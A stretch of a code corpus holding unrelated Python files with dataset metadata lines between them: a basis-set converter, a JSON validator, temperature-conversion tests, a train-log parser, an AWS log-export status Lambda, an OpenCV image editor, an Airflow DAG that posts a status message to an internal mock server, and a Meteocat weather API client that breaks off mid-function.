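    # as a side effect, so this both saves and previews the data.
    pprint.pprint(scrape_top_list()[:3])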
| 3.15625
| 3
|
basis_set_exchange/convert.py
|
BasisSetExchange/basis_set_exchange
| 4
|
12782871
|
<reponame>BasisSetExchange/basis_set_exchange
# Copyright (c) 2017-2022 The Molecular Sciences Software Institute, Virginia Tech
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''
Functions for basis set conversion
'''
from .readers import read_formatted_basis_file, read_formatted_basis_str
from .writers import write_formatted_basis_file, write_formatted_basis_str
from .manip import make_general
def convert_formatted_basis_str(basis_in, in_fmt, out_fmt):
'''Convert a formatted basis set to another format
Parameters
----------
basis_in : str
String representing the formatted input basis set input
in_fmt : str
The format of the basis set stored in basis_in
out_fmt : str
The desired output format
Returns
-------
str
The basis set as a str with the new format
'''
basis_dict = read_formatted_basis_str(basis_in, in_fmt, validate=True, as_component=False)
return write_formatted_basis_str(basis_dict, out_fmt)
def convert_formatted_basis_file(file_path_in,
file_path_out,
in_fmt=None,
out_fmt=None,
encoding='utf-8-sig',
make_gen=False):
'''Convert a formatted basis set file to another format
Parameters
----------
file_path_in : str
Path to the file to be read
file_path_out : str
Path to the file to be written.
in_fmt : str
The format of the basis to be read. If None, it is detected from the file name
out_fmt : str
The format of the basis to be written. If None, it is detected from the file name
encoding : str
The encoding of the input file
    make_gen : bool
        If True, the basis set is passed through make_general before writing
'''
basis_dict = read_formatted_basis_file(file_path_in,
basis_fmt=in_fmt,
encoding=encoding,
validate=True,
as_component=False)
if make_gen:
basis_dict = make_general(basis_dict, use_copy=False)
write_formatted_basis_file(basis_dict, file_path_out, basis_fmt=out_fmt)
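# Example usage (illustrative; the file names and the 'nwchem'/'gaussian94'
# format keys below are assumptions, not taken from this module):
#
#     convert_formatted_basis_file('sto-3g.nw', 'sto-3g.gbs',
#                                  in_fmt='nwchem', out_fmt='gaussian94')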
| 0.980469
| 1
|
validate/utils.py
|
oguzhanunlu/validate_json
| 0
|
12782872
|
# -*- coding: utf-8 -*-
import jsonschema
import sys
def clean_doc(doc):
"""
    Recursively remove keys whose value is None from the given JSON document
    (descends into nested dicts, but not into lists).
    :param doc: Raw JSON document that may contain None values
:return: Cleaned JSON document
"""
for key, value in list(doc.items()):
if value is None:
del doc[key]
elif isinstance(value, dict):
clean_doc(value)
return doc
def is_valid(doc, schema):
"""
Checks if given doc is valid against given schema
:param doc: to be validated JSON
:param schema: base JSON
:return: a boolean result and error
"""
try:
jsonschema.validate(doc, schema)
sys.stdout.write("OK\n")
return True, None
except jsonschema.exceptions.ValidationError as val_err:
sys.stderr.write("FAIL\n")
return False, val_err
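if __name__ == "__main__":
    # Illustrative self-check; the schema below is a made-up example.
    example_schema = {"type": "object", "required": ["name"]}
    cleaned = clean_doc({"name": "example", "nickname": None})
    is_valid(cleaned, example_schema)  # prints "OK" on stdout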
| 2.953125
| 3
|
tests/test_degrees.py
|
thierrydecker/siarnaq
| 0
|
12782873
|
<reponame>thierrydecker/siarnaq
"""Degrees tests module.
Copyright (c) 2020 <NAME>
All Rights Reserved.
Released under the MIT license
"""
import pytest
from siarnaq.degrees import Degree
def test_instantiations():
assert isinstance(Degree(), Degree)
assert isinstance(Degree('ce'), Degree)
assert isinstance(Degree('fa'), Degree)
assert isinstance(Degree('ke'), Degree)
assert isinstance(Degree('ra'), Degree)
assert isinstance(Degree(temp=10), Degree)
assert isinstance(Degree(scale='ce'), Degree)
assert isinstance(Degree(scale='fa'), Degree)
assert isinstance(Degree(scale='ke'), Degree)
assert isinstance(Degree(scale='ra'), Degree)
assert isinstance(Degree(scale='ce', temp=0), Degree)
assert isinstance(Degree(scale='fa', temp=0), Degree)
assert isinstance(Degree(scale='ke', temp=0), Degree)
assert isinstance(Degree(scale='ra', temp=0), Degree)
with pytest.raises(Exception):
assert Degree(scale='Dummy')
with pytest.raises(Exception):
assert Degree(temp='Dummy')
with pytest.raises(Exception):
assert Degree(scale='Dummy', temp='Dummy')
def test_static_methods():
assert round(Degree.conv_ce_to_fa(temp=0), 2) == 32.00
assert round(Degree.conv_ce_to_ke(temp=0), 2) == 273.15
assert round(Degree.conv_ce_to_ra(temp=0), 2) == 491.67
assert round(Degree.conv_fa_to_ce(temp=32), 2) == 0.00
assert round(Degree.conv_fa_to_ke(temp=32), 2) == 273.15
assert round(Degree.conv_fa_to_ra(temp=32), 2) == 491.67
assert round(Degree.conv_ke_to_ce(temp=0), 2) == -273.15
assert round(Degree.conv_ke_to_fa(temp=273.15), 2) == 32.00
assert round(Degree.conv_ke_to_ra(temp=100), 2) == 180
assert round(Degree.conv_ra_to_ce(temp=100), 2) == -217.59
assert round(Degree.conv_ra_to_fa(temp=100), 2) == -359.67
assert round(Degree.conv_ra_to_ke(temp=100), 2) == 55.56
def test_properties_getters():
assert Degree().scales == {'ce', 'fa', 'ke', 'ra'}
r = Degree(scale='ce', temp=0)
assert r.scale == 'ce'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
r = Degree(scale='fa', temp=0)
assert r.scale == 'fa'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
r = Degree(scale='ke', temp=0)
assert r.scale == 'ke'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0
assert round(r.rankine, 2) == 0
r = Degree(scale='ra', temp=0)
assert r.scale == 'ra'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0
assert round(r.rankine, 2) == 0
def test_properties_setters():
#
# From 'ce' to 'fa'
#
r = Degree(scale='ce', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == 32.00
assert round(r.celcius, 2) == 0
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'ce' to 'ke'
#
r = Degree(scale='ce', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 273.15
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'ce' to 'ra'
#
r = Degree(scale='ce', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 491.67
assert round(r.celcius, 2) == 0.00
assert round(r.fahrenheit, 2) == 32.00
assert round(r.kelvin, 2) == 273.15
assert round(r.rankine, 2) == 491.67
#
# From 'fa' to 'ce'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -17.78
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'fa' to 'ke'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 255.37
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'fa' to 'ra'
#
r = Degree(scale='fa', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 459.67
assert round(r.celcius, 2) == -17.78
assert round(r.fahrenheit, 2) == 0.00
assert round(r.kelvin, 2) == 255.37
assert round(r.rankine, 2) == 459.67
#
# From 'ke' to 'ce'
#
r = Degree(scale='ke', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -273.15
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ke' to 'fa'
#
r = Degree(scale='ke', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == -459.67
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ke' to 'ra'
#
r = Degree(scale='ke', temp=0)
r.scale = 'ra'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'ce'
#
r = Degree(scale='ra', temp=0)
r.scale = 'ce'
assert round(r.temp, 2) == -273.15
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'fa'
#
r = Degree(scale='ra', temp=0)
r.scale = 'fa'
assert round(r.temp, 2) == -459.67
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
#
# From 'ra' to 'ke'
#
r = Degree(scale='ra', temp=0)
r.scale = 'ke'
assert round(r.temp, 2) == 0.00
assert round(r.celcius, 2) == -273.15
assert round(r.fahrenheit, 2) == -459.67
assert round(r.kelvin, 2) == 0.00
assert round(r.rankine, 2) == 0.00
with pytest.raises(Exception):
r = Degree()
r.scale = 'Dummy'
def test_add():
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=20.0)
r = r1 + r2
assert r.scale == 'ce'
assert r.temp == 21.00
r1 = Degree(scale='fa', temp=1.0)
r2 = Degree(scale='fa', temp=2.0)
r = r1 + r2
assert r.scale == 'fa'
assert r.temp == 3.00
r1 = Degree(scale='fa', temp=1.0)
r = r1 + 2.00
assert r.scale == 'fa'
assert r.temp == 3.00
r1 = Degree(scale='ke', temp=1.0)
r = 2.00 + r1
assert r.scale == 'ke'
assert r.temp == 3.00
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=1.0)
r1 += r2
assert r1.scale == 'ce'
assert r1.temp == 2.00
r1 = Degree(scale='ce', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 += r2
assert r1.scale == 'ce'
assert r1.temp == -273.15
r1 = Degree(scale='ra', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 += r2
assert r1.scale == 'ra'
assert r1.temp == 0.00
r1 = Degree(scale='ke', temp=0.0)
r2 = Degree(scale='ra', temp=0.0)
r1 += r2
assert r1.scale == 'ke'
assert r1.temp == 0.00
def test_sub():
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=2.0)
r = r1 - r2
assert r.scale == 'ce'
assert r.temp == -1.00
r1 = Degree(scale='fa', temp=1.0)
r = r1 - 2.00
assert r.scale == 'fa'
assert r.temp == -1.00
r1 = Degree(scale='ce', temp=1.0)
r2 = Degree(scale='ce', temp=1.0)
r1 -= r2
assert r1.scale == 'ce'
assert r1.temp == 0.00
r1 = Degree(scale='fa', temp=0.0)
r2 = Degree(scale='ce', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'fa'
assert r1.temp == -32.00
r1 = Degree(scale='ke', temp=0.0)
r2 = Degree(scale='ra', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'ke'
assert r1.temp == 0.00
r1 = Degree(scale='ra', temp=0.0)
r2 = Degree(scale='ke', temp=0.0)
r1 = r1 - r2
assert r1.scale == 'ra'
assert r1.temp == 0.00
def test_mul():
r1 = Degree(scale='ce', temp=2.0)
r = r1 * 10
assert r.scale == 'ce'
assert r.temp == 20.00
r1 = Degree(scale='fa', temp=2.0)
r = 20 * r1
assert r.scale == 'fa'
assert r.temp == 40.00
r1 = Degree(scale='ke', temp=2.0)
r = 20 * r1
assert r.scale == 'ke'
assert r.temp == 40.00
r1 = Degree(scale='ra', temp=20.0)
r = r1 * 2
assert r.scale == 'ra'
assert r.temp == 40.00
def test_div():
r1 = Degree(scale='ce', temp=2.0)
r = r1 / 10
assert r.scale == 'ce'
assert r.temp == 0.20
r1 = Degree(scale='fa', temp=10.0)
r = r1 / 10
assert r.scale == 'fa'
assert r.temp == 1.0
r1 = Degree(scale='ke', temp=5.0)
r = r1 / 2
assert r.scale == 'ke'
assert r.temp == 2.5
r1 = Degree(scale='ra', temp=10.0)
r = r1 / 2
assert r.scale == 'ra'
assert r.temp == 5.0
def test_str():
r = Degree('ce')
assert str(r) == '0.0 °C'
r.scale = 'fa'
r.temp = 0
assert str(r) == '0.0 °F'
r.scale = 'ke'
r.temp = 0
assert str(r) == '0.0 K'
r.scale = 'ra'
r.temp = 0
assert str(r) == '0.0 °Ra'
def test_repr():
r = Degree('ce')
assert repr(r) == 'Degree(\'ce\', 0.0)'
r.scale = 'fa'
r.temp = 0
assert repr(r) == 'Degree(\'fa\', 0.0)'
r.scale = 'ke'
r.temp = 0
assert repr(r) == 'Degree(\'ke\', 0.0)'
r.scale = 'ra'
r.temp = 0
assert repr(r) == 'Degree(\'ra\', 0.0)'
| 2.5
| 2
|
External/Objects.py
|
Occy88/TrainSimulator
| 0
|
12782874
|
import os
import json
cwd=os.getcwd()
weighted_graph_dict={}
stop_dict = {}
off_stop_dict={}
with open(cwd + '/WeightedGraph', 'r') as f:
line = True
while line:
line = f.readline()
if line:
data = json.loads(line)
weighted_graph_dict = data
exception_dict={}
with open(cwd + '/RouteData', 'r') as f:
line=True
while line:
line=f.readline()
print(line)
if line:
data=json.loads(line)
print(data)
with open(cwd + '/TrainLog', 'r') as f:
line=True
while line:
line=f.readline()
if line:
data=json.loads(line)
            if data['id'] not in off_stop_dict:
                off_stop_dict[data['id']] = data['name']
            if data['name'] not in off_stop_dict:
                off_stop_dict[data['name']] = {}
            if len(data['train']) > 0:
                train = data['train']
                # record this sighting under its train id, creating the entry on first sight
                loc_train = off_stop_dict[data['name']].setdefault(train['id'], {})
                loc_train[data['time']] = {'stop_list': train['stop_list'], 'stop_index': train['stop_index']}
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
# with open(cwd + '/External/test', 'w')as f1:
# json.dump(off_stop_dict,f1)
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
print(off_stop_dict['Bank'])
for stuff in off_stop_dict:
if off_stop_dict[stuff]=='Waterloo':
print(stuff)
"""
structure of data produced:
{
id:{
name: "full-name"
trips:{
money: "money-left"
trip_time: "hours-min-sec"
trip_cost: "cost"
trip_taken: "loctionA-locationB"
transits: [station1,station2,station3]
arrival_time: "time"
trains_taken: {
train Id:
{
Time: {
stop_list:[1,2,3]
stop_index: index
}
}
}
}
}
"""
"""
structure of dictionary:
{data
stopId:"stationName",
stopId2:"stationName2",
station_name: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
station_name2: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
}
"""
| 2.578125
| 3
|
sfn-log-export/src/functions/export_status_check/index.py
|
Domt301/serverless-patterns
| 883
|
12782875
|
<gh_stars>100-1000
import boto3
log_client = boto3.client('logs')
def handler(event, context):
task_id = event['taskId']
result = log_client.describe_export_tasks(taskId=task_id)
# per documentation, only one export can run at a time per account,
# therefore ensure none are running in this account
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.describe_export_tasks
# result = log_client.describe_export_tasks(statusCode='CANCELLED' | 'PENDING' | 'PENDING_CANCEL' | 'RUNNING')
status = 'RUNNING'
task_status = result.get('exportTasks')
if len(task_status) != 0:
task_status = task_status[0].get('status').get('code')
if task_status not in ['PENDING', 'PENDING_CANCEL', 'RUNNING']:
status = 'NOT_RUNNING'
return {"Status": status}
| 2.203125
| 2
|
scripts.py
|
packetsss/Image-Editor
| 6
|
12782876
|
# Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited
import numpy as np
import cv2
from scipy import ndimage
import math
from copy import deepcopy
class Images:
def __init__(self, img):
self.img = cv2.imread(img, 1)
if self.img.shape[0] / self.img.shape[1] < 0.76:
self.img_width = 1100
self.img_height = int(self.img_width * self.img.shape[0] / self.img.shape[1])
else:
self.img_height = 700
self.img_width = int(self.img_height * self.img.shape[1] / self.img.shape[0])
self.img = cv2.resize(self.img, (self.img_width, self.img_height))
self.img_copy = deepcopy(self.img)
self.grand_img_copy = deepcopy(self.img)
self.img_name = img.split('\\')[-1].split(".")[0]
self.img_format = img.split('\\')[-1].split(".")[1]
self.left, self.right, self.top, self.bottom = None, None, None, None
# self.bypass_censorship()
def auto_contrast(self):
clip_hist_percent = 20
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
hist = cv2.calcHist([gray], [0], None, [256], [0, 256])
hist_size = len(hist)
accumulator = [float(hist[0])]
for index in range(1, hist_size):
accumulator.append(accumulator[index - 1] + float(hist[index]))
maximum = accumulator[-1]
clip_hist_percent *= (maximum / 100.0)
clip_hist_percent /= 2.0
minimum_gray = 0
while accumulator[minimum_gray] < clip_hist_percent:
minimum_gray += 1
maximum_gray = hist_size - 1
while accumulator[maximum_gray] >= (maximum - clip_hist_percent):
maximum_gray -= 1
alpha = 255 / (maximum_gray - minimum_gray)
beta = -minimum_gray * alpha
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def auto_sharpen(self):
self.img = cv2.detailEnhance(self.img, sigma_s=10, sigma_r=0.3)
def auto_cartoon(self, style=0):
edges1 = cv2.bitwise_not(cv2.Canny(self.img, 100, 200))
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
gray = cv2.medianBlur(gray, 5)
edges2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, 7)
dst = cv2.edgePreservingFilter(self.img, flags=2, sigma_s=64, sigma_r=0.25)
if not style:
# less blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges1)
else:
# more blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges2)
def auto_invert(self):
self.img = cv2.bitwise_not(self.img)
def change_b_c(self, alpha=1, beta=0):
# contrast from 0 to 3, brightness from -100 to 100
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def change_saturation(self, value):
# -300 to 300
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
(h, s, v) = cv2.split(img_hsv)
s += value
s = np.clip(s, 0, 255)
img_hsv = cv2.merge([h, s, v])
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def remove_color(self, color):
h = color.lstrip('#')
color = np.array([int(h[i:i + 2], 16) for i in (0, 2, 4)])
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
low = np.array([color[0] - 15, 0, 20])
high = np.array([color[0] + 15, 255, 255])
mask = cv2.inRange(img_hsv, low, high)
img_hsv[mask > 0] = (0, 0, 255)
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def crop_img(self, left, right, top, bottom):
self.img = self.img[left:right, top:bottom]
def rotate_img(self, angle, crop=False, flip=[False, False]):
self.reset(flip)
if not crop:
self.img = cv2.resize(self.img, (0, 0), fx=0.5, fy=0.5)
w, h = self.img.shape[1], self.img.shape[0]
else:
w, h = self.img_width, self.img_height
self.img = ndimage.rotate(self.img, angle)
angle = math.radians(angle)
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
        # gamma is the bounding-box diagonal angle from the largest-rotated-rect
        # derivation; the branches must differ (atan2(x, x) is always pi/4)
        gamma = math.atan2(bb_w, bb_h) if (w < h) else math.atan2(bb_h, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
wr, hr = bb_w - 2 * x, bb_h - 2 * y
midpoint = (np.array(self.img.shape[:-1]) // 2)[::-1]
half_w, half_h = wr // 2, hr // 2
self.left, self.right, self.top, self.bottom = int(midpoint[0] - half_w), int(midpoint[0] + half_w), \
int(midpoint[1] - half_h), int(midpoint[1] + half_h)
def detect_face(self):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')
# eye_cascade = cv2.CascadeClassifier('data/haarcascade_eye.xml')
gray_scale_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
face_coord = face_cascade.detectMultiScale(gray_scale_img)
return face_coord
def bypass_censorship(self):
width = self.img.shape[1]
height = self.img.shape[0]
smaller_img = cv2.resize(self.img, (width // 2, height // 2))
image = np.zeros(self.img.shape, np.uint8)
        try:
            image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.ROTATE_180)
            image[height // 2:, :width // 2] = smaller_img
            image[height // 2:, width // 2:] = cv2.rotate(smaller_img, cv2.ROTATE_180)
            image[:height // 2, width // 2:] = smaller_img
        except ValueError:
            # odd height: shift the lower half down by one row
            try:
                image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.ROTATE_180)
                image[height // 2 + 1:, :width // 2] = smaller_img
                image[height // 2 + 1:, width // 2:] = cv2.rotate(smaller_img, cv2.ROTATE_180)
                image[:height // 2, width // 2:] = smaller_img
            except ValueError:
                # odd width: shift the right half right by one column
                image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.ROTATE_180)
                image[height // 2:, :width // 2] = smaller_img
                image[height // 2:, width // 2 + 1:] = cv2.rotate(smaller_img, cv2.ROTATE_180)
                image[:height // 2, width // 2 + 1:] = smaller_img
self.img = image
def save_img(self, file):
cv2.imwrite(file, self.img)
def reset(self, flip=None):
if flip is None:
flip = [False, False]
self.img = deepcopy(self.img_copy)
if flip[0]:
self.img = cv2.flip(self.img, 0)
if flip[1]:
self.img = cv2.flip(self.img, 1)
def grand_reset(self):
self.img = deepcopy(self.grand_img_copy)
self.img_copy = deepcopy(self.grand_img_copy)
def main():
path = "ppl.jpg"
img = Images(path)
img_name = path.split('\\')[-1].split(".")[0]
cv2.imshow(img_name, img.img)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
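# Illustrative follow-up: rotate_img() stores the largest black-border-free
# bounds, which crop_img() can then consume. Note crop_img(a, b, c, d)
# slices rows with a:b and columns with c:d.
#
#     img = Images("ppl.jpg")
#     img.rotate_img(30)
#     img.crop_img(img.top, img.bottom, img.left, img.right)
#     img.save_img("ppl_rotated.jpg")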
| 2.671875
| 3
|
apps/airflow/dags/dependent_dag.py
|
ceelo777/k8splayground
| 5
|
12782877
|
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.bash_operator import BashOperator
from airflow.sensors.external_task_sensor import ExternalTaskSensor
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime(2020, 6, 7),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=1)
}
dag = DAG(
'dependent-dag',
default_args=default_args,
schedule_interval='*/5 * * * *',
catchup=False,
)
start = ExternalTaskSensor(
task_id='start-task',
external_dag_id='example-dag',
external_task_id='python-print',
execution_delta=timedelta(minutes=5),
timeout=3*60,
dag=dag,
)
curl = BashOperator(
bash_command=r"""curl -H "Content-Type: application/json" -d '{"status":"dependency successful", "time":"{{ ts }}"}' mock-server.default.svc.cluster.local""",
task_id="curl-task",
dag=dag,
)
curl.set_upstream(start)
| 2.234375
| 2
|
meteocat_api_client/xarxes/xema/mesurades.py
|
herrera-lu/meteocat-api-client
| 0
|
12782878
|
from typing import List
from ...excepcions import MeteocatLocalError
from ...helpers.utils import formateja_valors_data, neteja_diccionari, genera_info
class Mesurades:
def mesurades_x_1_variable_d_totes_estacions_o_1_estacio(
self, codi_variable: int, any: int, mes: int, dia: int, codi_estacio: str = None
) -> dict:
"""
        Returns information for one variable across all stations for a given day; if a station code is provided, returns that variable's data for the requested station only.
Args:
            codi_variable (int): Code of the variable to query.
            any (int): Year of the query in numeric format YYYY.
            mes (int): Month of the query in numeric format MM.
            dia (int): Day of the query in numeric format DD.
            codi_estacio (str, optional): Code of the station to query. Defaults to None.
Returns:
dict: {
"codi": 32,
"lectures": [
{
"data": "2017-03-27T00:00Z",
"valor": 8.3,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"data": "2017-03-27T23:30Z",
"valor": 8.5,
"estat": "V",
"baseHoraria": "SH"
}
]
}
"""
any, mes, dia = formateja_valors_data(any, mes, dia)
recurs = f"variables/mesurades/{codi_variable}/{any}/{mes}/{dia}"
if codi_estacio:
params = {"codi_estacio": codi_estacio}
else:
params = None
return self._aconsegueix(recurs, params)
def mesurades_x_totes_variables_d_1_estacio(
self, codi_estacio: str, any: int, mes: int, dia: int
) -> List[dict]:
"""
        Returns information for all variables of one station for a given day.
Args:
            codi_estacio (str): Code of the station to query.
            any (int): Year of the query in numeric format YYYY.
            mes (int): Month of the query in numeric format MM.
            dia (int): Day of the query in numeric format DD.
Returns List[dict]: [
{
"codi": "CC",
"variables": [
{
"codi": 1,
"lectures": [
{
"data": "2020-06-16T00:00Z",
"dataExtrem": "2020-06-16T00:05Z",
"valor": 947.3,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"codi": 30,
"lectures": [
{
"data": "2020-06-16T00:00Z",
"valor": 0.6,
"estat": "V",
"baseHoraria": "SH"
},
{
"data": "2020-06-16T00:30Z",
"valor": 0.6,
"estat": "V",
"baseHoraria": "SH"
},
...
{
"data": "2020-06-16T23:00Z",
"dataExtrem": "2020-06-16T23:00Z",
"valor": 0,
"estat": "V",
"baseHoraria": "SH"
},
{
"data": "2020-06-16T23:30Z",
"dataExtrem": "2020-06-16T23:30Z",
"valor": 0,
"estat": "V",
"baseHoraria": "SH"
}
]
}
]
}
]
"""
any, mes, dia = formateja_valors_data(any, mes, dia)
recurs = f"estacions/mesurades/{codi_estacio}/{any}/{mes}/{dia}"
return self._aconsegueix(recurs)
def mesurades_ultimes_dades_x_1_variable_d_totes_estacions_o_1_estacio(
self, codi_variable: int, codi_estacio: str = None
) -> dict:
"""
        Returns the last measurement within the last 4 hours of one variable for all stations, filtered by station if one is given.
Args:
            codi_variable (int): Code of the variable to query.
            codi_estacio (str, optional): Code of the station to query. Defaults to None.
Returns:
dict: {
"codi": 5,
"lectures": [
{
"data": "2017-07-24T09:00Z",
"dataExtrem": "2017-07-24T09:00Z",
"valor": 24.7,
"estat": " ",
"baseHoraria": "SH"
}
]
}
"""
recurs = f"variables/mesurades/{codi_variable}/ultimes"
if codi_estacio:
params = {"codiEstacio": codi_estacio}
else:
params = None
return self._aconsegueix(recurs, params)
def mesurades_metadades_x_totes_variables_d_1_estacio(
self, codi_estacio: str, estat: str = None, data: str = None
) -> List[dict]:
        # TODO: Use a datetime object for the date.
"""
        Returns the metadata of every variable measured by the station whose code is given in the URL, filtered by state and date if specified.
Args:
            codi_estacio (str): Identifier code of the weather station to query.
            estat (str, optional): State of the station. Possible values: [ope, des, bte]. Defaults to None.
            data (str, optional): Date to filter the state by. Defaults to None.
Raises:
            MeteocatLocalError: Raised locally for invalid argument combinations, before any request is sent to the Meteocat API.
Returns:
List[dict]: [
{
"codi": 3,
"nom": "Humitat relativa màxima",
"unitat": "%",
"acronim": "HRx",
"tipus": "DAT",
"decimals": 0,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
},
...
{
"codi": 72,
"nom": "Precipitació màxima en 1 minut",
"unitat": "mm",
"acronim": "PPTx1min",
"tipus": "DAT",
"decimals": 1,
"estats": [
{
"codi": 2,
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
],
"basesTemporals": [
{
"codi": "HO",
"dataInici": "2009-07-15T09:00Z",
"dataFi": null
}
]
}
]
"""
recurs = f"estacions/{codi_estacio}/variables/mesurades/metadades"
        # TODO: Refactor into a helper function reusable in all similar cases.
params = None
if (estat and not data) or (not estat and data):
codi_error = 400
missatge_error = "Falta l'estat o la data"
params = neteja_diccionari(locals(), "self", "recurs")
